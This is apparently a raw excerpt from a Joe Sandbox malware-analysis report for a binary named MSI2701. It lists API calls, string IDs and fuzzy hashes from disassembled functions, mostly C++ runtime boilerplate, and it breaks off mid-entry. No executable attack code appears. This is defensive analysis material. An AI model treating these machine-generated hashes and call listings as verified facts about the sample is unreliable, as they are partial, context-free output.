• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 56fd5590e050d63ecd0a6cff4e533b7a72852f2293a634ba620e825b21884749
• Instruction ID: f7cdb124b058aa12413b354d6fe2423bed7824bccff2eeceaf697e66ab9ad215
• Opcode Fuzzy Hash: 56fd5590e050d63ecd0a6cff4e533b7a72852f2293a634ba620e825b21884749
• Instruction Fuzzy Hash: 9201F972209A51DFA62017776C899EF1B54DB2537FB20032FF114842E2EF191C056198
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: _strcspn$H_prolog3_ctype
• String ID: 2N
• API String ID: 838279627-2395104290
• Opcode ID: 38f5b459090c7e3cbab85acff1ca347675d452f4318e8ef95351c1afaf236c24
• Instruction ID: 06b2d738c2c4cabc2d21063fb3455068dc2c6c90f013bd7a2d70da3eeeb9f5a5
• Opcode Fuzzy Hash: 38f5b459090c7e3cbab85acff1ca347675d452f4318e8ef95351c1afaf236c24
• Instruction Fuzzy Hash: A7B16AB5900249AFDF11DF99C994AEEBBB5FF48305F14401BE805AB311D338AE52CB69
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: _strcspn$H_prolog3_ctype
• String ID: 2N
• API String ID: 838279627-2395104290
• Opcode ID: 311b54889969cc42860a74734b2a73b186f265207134124a8484b6a180c873ed
• Instruction ID: 302c10278438cd4c28f8ae8440ef2b296939b125ef76306281b70e32a939ad2f
• Opcode Fuzzy Hash: 311b54889969cc42860a74734b2a73b186f265207134124a8484b6a180c873ed
• Instruction Fuzzy Hash: 8EB14B79D002499FDF50DF94C981EEEBBB9EF08304F14402EE805AB215D778AE46CB69
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,C7C71CC4,?,00000004), ref: 004C3294
• MoveFileW.KERNEL32(?,00000000), ref: 004C354A
• DeleteFileW.KERNEL32(?), ref: 004C3592
  • Part of subcall function 004C1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 004C1AF7
  • Part of subcall function 004C1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 004C1B7D
  • Part of subcall function 004C2E60: LocalFree.KERNEL32(?,C7C71CC4,?,?,00503C40,000000FF,?,004C1242,C7C71CC4,?,?,00503C75,000000FF), ref: 004C2EB1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: FileLocal$Free$AllocDeleteMoveNameTemp
• String ID: URL$url
• API String ID: 853893950-346267919
• Opcode ID: c46b96f0a1463d11721216660785767212f8fa61eb4312259329087b6855e587
• Instruction ID: b39c4ec2276dae9849aadb7e2e0ea57cee7de098a848b71eafe68de1c5596463
• Opcode Fuzzy Hash: c46b96f0a1463d11721216660785767212f8fa61eb4312259329087b6855e587
• Instruction Fuzzy Hash: FDC17A74D142689ADB64DF24CC98BDDB7B4BF14308F1042DED009A7291EBB96B88CF95
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
Similarity
• API ID: AdjustPointer
• String ID: 2N
• API String ID: 1740715915-2395104290
• Opcode ID: 3de092ee864632f135ba9ed3716c84f6dc09fbb53b343557dc92a929b9778e1a
• Instruction ID: e79698d96922f218bdc2a7fb017bb5232d61521a9eeea96c3a88f3fefb08a839
• Opcode Fuzzy Hash: 3de092ee864632f135ba9ed3716c84f6dc09fbb53b343557dc92a929b9778e1a
• Instruction Fuzzy Hash: BE510472A00B869FDB299F13D851B6A77A4FF4431AF14462FE90187291E738FC40C758
                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004C3735
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00504215,000000FF), ref: 004C381A
                                                                                                                                                              • Part of subcall function 004C2310: GetProcessHeap.KERNEL32 ref: 004C2365
                                                                                                                                                              • Part of subcall function 004C46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,004C3778,-00000010,?,?,?,00504215,000000FF), ref: 004C4736
                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 004C37C6
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00504215,000000FF), ref: 004C37DB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                             • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                            • String ID: ntdll.dll
                                                                                                                                                            • API String ID: 3941625479-2227199552
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004DD3D2
                                                                                                                                                              • Part of subcall function 004D254E: __EH_prolog3.LIBCMT ref: 004D2555
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004DD46E
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N$%.0Lf$0123456789-
                                                                                                                                                            • API String ID: 2544715827-1323058517
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004DD676
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004DD712
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                            • String ID: 2N$0123456789-$0123456789-
                                                                                                                                                            • API String ID: 3042121994-3087677497
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004E1761
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004E17FB
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                            • String ID: 2N$0123456789-$0123456789-
                                                                                                                                                            • API String ID: 3042121994-3087677497
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004C1A20: LocalFree.KERNEL32(?), ref: 004C1A42
                                                                                                                                                              • Part of subcall function 004E3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,004C1434,?,?,004CD341,004C1434,00518B5C,?,004C1434,?,00000000), ref: 004E3EBA
                                                                                                                                                            • GetCurrentProcess.KERNEL32(C7C71CC4,C7C71CC4,?,?,00000000,00504981,000000FF), ref: 004C62EB
                                                                                                                                                              • Part of subcall function 004E2C98: EnterCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CA3
                                                                                                                                                              • Part of subcall function 004E2C98: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CE0
                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 004C62B0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C62B7
                                                                                                                                                              • Part of subcall function 004E2C4E: EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
                                                                                                                                                              • Part of subcall function 004E2C4E: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
                                                                                                                                                              • Part of subcall function 004E2C4E: RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                                            • API String ID: 1333104975-3789238822
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                            • String ID: $+xv
                                                                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(C7C71CC4,C7C71CC4,?,?,00000000,00504981,000000FF), ref: 004C62EB
                                                                                                                                                              • Part of subcall function 004E2C98: EnterCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CA3
                                                                                                                                                              • Part of subcall function 004E2C98: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CE0
                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 004C62B0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C62B7
                                                                                                                                                              • Part of subcall function 004E2C4E: EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
                                                                                                                                                              • Part of subcall function 004E2C4E: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
                                                                                                                                                              • Part of subcall function 004E2C4E: RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                                            • API String ID: 2056477612-3789238822
                                                                                                                                                            • Opcode ID: b6b05206ae5c93c61bc63f2b671f175afb227e497d35c13344e4595937f7fab7
                                                                                                                                                            • Instruction ID: 1173e6332ab213d04670d2e0ac859eb813da3fd0895adeb72d13c841d3e2bc59
                                                                                                                                                            • Opcode Fuzzy Hash: b6b05206ae5c93c61bc63f2b671f175afb227e497d35c13344e4595937f7fab7
                                                                                                                                                            • Instruction Fuzzy Hash: 1511D2B2E04658DFDB10CF54ED46B9EB7A8F728710F10466AEC11933D0E7796904CA51
APIs
• FreeLibrary.KERNEL32(00000000,?,?,?,004E6AA3,?,?,0051DDCC,00000000,?,004E6BCE,00000004,InitializeCriticalSectionEx,005097E8,InitializeCriticalSectionEx,00000000), ref: 004E6A72
Strings
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: e51c651ce81335c2941d3b44d2c6e83189ec908890b8d353853c53281727b932
• Instruction ID: 919658207358bc46896800fb0f2bf180828f40eb874e755df52f68c44f3aaf6d
• Opcode Fuzzy Hash: e51c651ce81335c2941d3b44d2c6e83189ec908890b8d353853c53281727b932
• Instruction Fuzzy Hash: 5B11C432E00265ABCB229B6A9C4475E37A49F237B2F164272F914B7380D664ED0086D9
APIs
• __EH_prolog3.LIBCMT ref: 004CD759
• std::_Lockit::_Lockit.LIBCPMT ref: 004CD763
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• std::_Facet_Register.LIBCPMT ref: 004CD7B4
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CD7D4
Strings
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID: 2N
• API String ID: 2854358121-2395104290
• Opcode ID: 01a3ecea5927e0c79f3dabf22a1a5664e09e470de2295260f501cbd8363d9133
• Instruction ID: 78e36f33f18765319d1145b8a793778b506104a837391e4e372c1331dd688868
• Opcode Fuzzy Hash: 01a3ecea5927e0c79f3dabf22a1a5664e09e470de2295260f501cbd8363d9133
• Instruction Fuzzy Hash: 4201AD39D001199BCB05AB618855BBE77B1BF84718F24041FE9016B3D1DF789E018BA9
APIs
• __EH_prolog3.LIBCMT ref: 004D2714
• std::_Lockit::_Lockit.LIBCPMT ref: 004D271E
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• std::_Facet_Register.LIBCPMT ref: 004D276F
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D278F
Strings
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID: 2N
• API String ID: 2854358121-2395104290
• Opcode ID: 8b9f724d38e83b4adc8f049f257b72c072d8c29d105ebd6a9c315b27b79f1153
• Instruction ID: d2a986c007caa2fc2a0ad74e41d18988a50306f06a7f71ca5ba0e052fd725d8b
• Opcode Fuzzy Hash: 8b9f724d38e83b4adc8f049f257b72c072d8c29d105ebd6a9c315b27b79f1153
• Instruction Fuzzy Hash: C901C03990012ADBCB15EB618919BBEB7B0BF94715F24050FE41067392DF789E058BA9
APIs
• __EH_prolog3.LIBCMT ref: 004CD7EE
• std::_Lockit::_Lockit.LIBCPMT ref: 004CD7F8
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• std::_Facet_Register.LIBCPMT ref: 004CD849
• std::_Lockit::~_Lockit.LIBCPMT ref: 004CD869
Strings
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID: 2N
• API String ID: 2854358121-2395104290
• Opcode ID: 541a20148a329cb69f34bda73c47dce86ddb4bc73569d85bf8621ccfc00e180d
• Instruction ID: dbb3e2933e7d5dbec27e1d476f64abee57e7d00c1999ef91a0b3198e20587e84
• Opcode Fuzzy Hash: 541a20148a329cb69f34bda73c47dce86ddb4bc73569d85bf8621ccfc00e180d
• Instruction Fuzzy Hash: 5301CB39C00119EBCB05BB618806BBE77A0AF90724F24045FE4106B391CF3C9E018BA9
APIs
• __EH_prolog3.LIBCMT ref: 004D27A9
• std::_Lockit::_Lockit.LIBCPMT ref: 004D27B3
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• std::_Facet_Register.LIBCPMT ref: 004D2804
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D2824
Strings
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID: 2N
• API String ID: 2854358121-2395104290
• Opcode ID: a50a16bd1d89276a4a83caafbf547dc897f906c8b7d81a3c465053836748d5a5
• Instruction ID: 805da9a4615168679c7b3122dc3f384baf14e99c6f80712597bed0536bbd1337
• Opcode Fuzzy Hash: a50a16bd1d89276a4a83caafbf547dc897f906c8b7d81a3c465053836748d5a5
• Instruction Fuzzy Hash: 170104358002159BCB01EB658915BBE77B0BF94715F24050FF90067392CF789E0197A9
APIs
• __EH_prolog3.LIBCMT ref: 004D283E
• std::_Lockit::_Lockit.LIBCPMT ref: 004D2848
  • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
  • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
• std::_Facet_Register.LIBCPMT ref: 004D2899
• std::_Lockit::~_Lockit.LIBCPMT ref: 004D28B9
Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: dedcb2d5fd0a473e2501a1cde3f70b6eda9c794c7533cfc5ef7d30cc85ff6d9d
                                                                                                                                                            • Instruction ID: fada91d35eb481430117022b549024b21bc923fd12a2826e19d43131190ce30f
                                                                                                                                                            • Opcode Fuzzy Hash: dedcb2d5fd0a473e2501a1cde3f70b6eda9c794c7533cfc5ef7d30cc85ff6d9d
                                                                                                                                                            • Instruction Fuzzy Hash: 20018B359001299BCB05EB618915ABE77A1BF94714F24060FF401A7392DF789E059BAA
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D28D3
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D28DD
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D292E
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D294E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 7354921775008aec716b6f204e8f4985e53a47d9105a4b29e04f96bbc354bbd9
                                                                                                                                                            • Instruction ID: d0bfdd55ae73ffbe70296b88b2cb4d569f01319e0290caf5b42c8a7bfb7658e4
                                                                                                                                                            • Opcode Fuzzy Hash: 7354921775008aec716b6f204e8f4985e53a47d9105a4b29e04f96bbc354bbd9
                                                                                                                                                            • Instruction Fuzzy Hash: 64010475900115DBCB01EB618925BBE77B1BF94724F24044FE51067391CFB89E018B99
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DE974
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DE97E
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DE9CF
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DE9EF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: d3d0dbbbf14b028fd914fdc2688d40ec1b46fd6ffb6c4fb5e72b88ae1380fe6b
                                                                                                                                                            • Instruction ID: d0736dea23b680b5e4d6d44d6cdafc956d857d506cf1d56d25cca98a6954b198
                                                                                                                                                            • Opcode Fuzzy Hash: d3d0dbbbf14b028fd914fdc2688d40ec1b46fd6ffb6c4fb5e72b88ae1380fe6b
                                                                                                                                                            • Instruction Fuzzy Hash: 1501C0759011199BCB05FB668865BBF77B4BF84714F24044FF5006B392CF789E019BA9
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEA09
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEA13
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEA64
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEA84
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: 3a9ae3ebd00622659214a98f1e361b0d1d52c7161ee2cd0cbbb312d4764cd428
                                                                                                                                                            • Instruction ID: fbe499bf6edd36c97c54005a5ce335ecdd161ce85514aa7a7dd8731c6594f919
                                                                                                                                                            • Opcode Fuzzy Hash: 3a9ae3ebd00622659214a98f1e361b0d1d52c7161ee2cd0cbbb312d4764cd428
                                                                                                                                                            • Instruction Fuzzy Hash: 7C01AD3590011ADBCB05FB6288A5BBE77B0BF94714F25040FE5006B391DF789E018BAA
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DEBC8
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004DEBD2
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004DEC23
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004DEC43
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 2854358121-2395104290
                                                                                                                                                            • Opcode ID: fb13fb0bb266c6d61183b5707de781b97a41de1dcbdd846f11e8d6ae40a84733
                                                                                                                                                            • Instruction ID: d35d7e0efb8d8549e2186ed4d23f3e64f77003770fdd8bdd68409e3859cf8dae
                                                                                                                                                            • Opcode Fuzzy Hash: fb13fb0bb266c6d61183b5707de781b97a41de1dcbdd846f11e8d6ae40a84733
                                                                                                                                                            • Instruction Fuzzy Hash: FA01C4359001199BCB15FB62C815BBE77B0BF94714F24084FE5106B3D1DF78AE05879A
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004D2BBC
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004D2BC6
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::_Lockit.LIBCPMT ref: 004C8C50
                                                                                                                                                              • Part of subcall function 004C8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 004C8C78
                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004D2C17
                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004D2C37
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
